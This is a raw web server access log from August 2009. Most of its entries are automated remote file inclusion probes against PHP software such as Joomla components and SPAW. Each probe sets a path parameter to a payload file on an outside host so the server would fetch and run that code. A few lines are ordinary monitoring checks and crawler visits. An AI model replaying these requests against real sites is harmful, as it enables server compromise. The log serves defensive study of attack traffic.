220.231.126.252 - - [03/Aug/2009:04:59:50 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:04:59:50 -0400] "GET /logs/access_log.Q109051900///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:04:59:50 -0400] "GET /logs///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:05:00:02 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:05:00:14 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:05:00:44 -0400] "GET /logs/access_log.Q109060100//admin/spaw/spaw_control.class.php?spaw_root=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:00:44 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:00:44 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:00:52 -0400] "GET /logs/access_log.Q109051800//admin/spaw/spaw_control.class.php?spaw_root=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
74.53.70.114 - - [03/Aug/2009:05:01:14 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:05:01:45 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:05:01:58 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:05:02:02 -0400] "GET /logs/error_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:05:02:13 -0400] "GET /logs/error_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:02:26 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:02:26 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 200 12144 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:02:26 -0400] "GET /logs/access_log.Q109071900///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:02:26 -0400] "GET /logs/error_log.Q109071900///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:03:19 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=%20http://www.002mag.com/oneadmin/photogallery/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:03:19 -0400] "GET /logs/access_log.Q109071900///?_SERVER[DOCUMENT_ROOT]=%20http://www.002mag.com/oneadmin/photogallery/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:03:19 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=%20http://www.002mag.com/oneadmin/photogallery/id1.txt?? HTTP/1.1" 200 12144 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:03:36 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:03:36 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:03:36 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.155.232.36 - - [03/Aug/2009:05:04:00 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.155.232.36 - - [03/Aug/2009:05:04:00 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.155.232.36 - - [03/Aug/2009:05:04:00 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:04:08 -0400] "GET /logs/access_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:05:04:16 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:04:17 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:04:17 -0400] "GET /logs/access_log.Q109060300//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.232.54.48 - - [03/Aug/2009:05:04:21 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:04:21 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 200 12144 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:04:24 -0400] "GET /logs/access_log.Q109071900///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:04:29 -0400] "GET /logs/access_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:05:04:29 -0400] "GET /logs/access_log.Q109072500//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
220.231.126.252 - - [03/Aug/2009:05:04:44 -0400] "GET /logs/error_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:05:03 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:05:03 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:05:03 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:05:09 -0400] "GET /logs/access_log.Q109070800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:05:11 -0400] "GET /logs/error_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:05:05:16 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:05:05:16 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:05:05:16 -0400] "GET /logs/access_log.Q109061400//accounts/inc/include.php?language=0&lang_settings[0][1]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:05:29 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:05:05:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.155.232.36 - - [03/Aug/2009:05:05:54 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:06:07 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:06:07 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:06:08 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:05:06:34 -0400] "GET /logs/access_log.Q109061400%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:06:53 -0400] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:06:54 -0400] "GET /logs/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 274 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:06:54 -0400] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:06:54 -0400] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:06:54 -0400] "GET /logs/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 274 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:06:55 -0400] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:07:03 -0400] "GET /logs/access_log.Q109071900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:07:15 -0400] "GET /logs/error_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:07:29 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:07:29 -0400] "GET /logs/access_log.Q109051800///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:07:29 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 200 12144 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:07:29 -0400] "GET /logs/access_log.Q109060100///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:08:09 -0400] "GET /logs/access_log.Q109051800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:05:08:23 -0400] "GET /logs/access_log.Q109071900%20%20///?_SERVER[DOCUMENT_ROOT]=%20http://www.002mag.com/oneadmin/photogallery/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:05:09:24 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [03/Aug/2009:05:09:26 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [03/Aug/2009:05:09:26 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
220.231.126.252 - - [03/Aug/2009:05:09:30 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.155.232.36 - - [03/Aug/2009:05:09:38 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.155.232.36 - - [03/Aug/2009:05:09:55 -0400] "GET /logs/error_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:10:27 -0400] "GET /logs/error_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:10:31 -0400] "GET /logs/access_log.Q109071300///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:05:10:36 -0400] "GET /logs/access_log.Q109070800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
209.59.12.99 - - [03/Aug/2009:05:10:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.231.126.252 - - [03/Aug/2009:05:11:20 -0400] "GET /logs/access_log.Q109071300///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:05:11:52 -0400] "GET /logs/access_log.Q109052600/calendre/config.php?inc_dir=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.93.147.154 - - [03/Aug/2009:05:11:52 -0400] "GET /calendre/config.php?inc_dir=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.93.147.154 - - [03/Aug/2009:05:11:52 -0400] "GET /logs/calendre/config.php?inc_dir=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.93.147.154 - - [03/Aug/2009:05:11:52 -0400] "GET /logs/access_log.Q109051000/calendre/config.php?inc_dir=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
220.231.126.252 - - [03/Aug/2009:05:12:01 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:05:12:20 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:13:46 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.todsaporn.com/test/cfg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.67.26.40 - - [03/Aug/2009:05:13:46 -0400] "GET /logs/access_log.Q109062200//?_SERVER[DOCUMENT_ROOT]=http://www.todsaporn.com/test/cfg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.67.26.40 - - [03/Aug/2009:05:13:46 -0400] "GET /logs/access_log.Q109050800//?_SERVER[DOCUMENT_ROOT]=http://www.todsaporn.com/test/cfg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.67.26.40 - - [03/Aug/2009:05:13:46 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.todsaporn.com/test/cfg?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.67.26.40 - - [03/Aug/2009:05:14:19 -0400] "GET /logs/error_log.Q109062200//?_SERVER[DOCUMENT_ROOT]=http://www.todsaporn.com/test/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.67.26.40 - - [03/Aug/2009:05:14:19 -0400] "GET /logs/access_log.Q109051800//?_SERVER[DOCUMENT_ROOT]=http://www.todsaporn.com/test/cfg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
115.88.240.91 - - [03/Aug/2009:05:15:53 -0400] "GET //searcharrays.php?addonDir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:05:15:53 -0400] "GET /logs//searcharrays.php?addonDir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:05:15:53 -0400] "GET /logs/access_log.Q109071900%20%20//searcharrays.php?addonDir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:05:15:57 -0400] "GET /logs/error_log.Q109071900%20%20//searcharrays.php?addonDir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:05:16:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.253.216 - - [03/Aug/2009:05:16:36 -0400] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:16:36 -0400] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 265 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:16:36 -0400] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:16:41 -0400] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:16:41 -0400] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 265 "-" "Mozilla/5.0"
67.15.253.216 - - [03/Aug/2009:05:16:42 -0400] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.og-fanclub.de/cms/components/com_freechat/themes/phpbb2/smileys/n? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
203.236.100.30 - - [03/Aug/2009:05:16:49 -0400] "GET /logs/access_log.Q109072700//admin/index.php//?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.236.100.30 - - [03/Aug/2009:05:16:49 -0400] "GET /logs//admin/index.php//?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
203.236.100.30 - - [03/Aug/2009:05:16:49 -0400] "GET //admin/index.php//?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.236.100.30 - - [03/Aug/2009:05:17:46 -0400] "GET /logs/access_log.Q109071900//admin/index.php//?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
220.181.7.121 - - [03/Aug/2009:05:18:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.145.31.242 - - [03/Aug/2009:05:18:18 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://shanghaisisa.com/skin/mic.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.145.31.242 - - [03/Aug/2009:05:18:19 -0400] "GET /index.php?pag=http://shanghaisisa.com/skin/mic.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
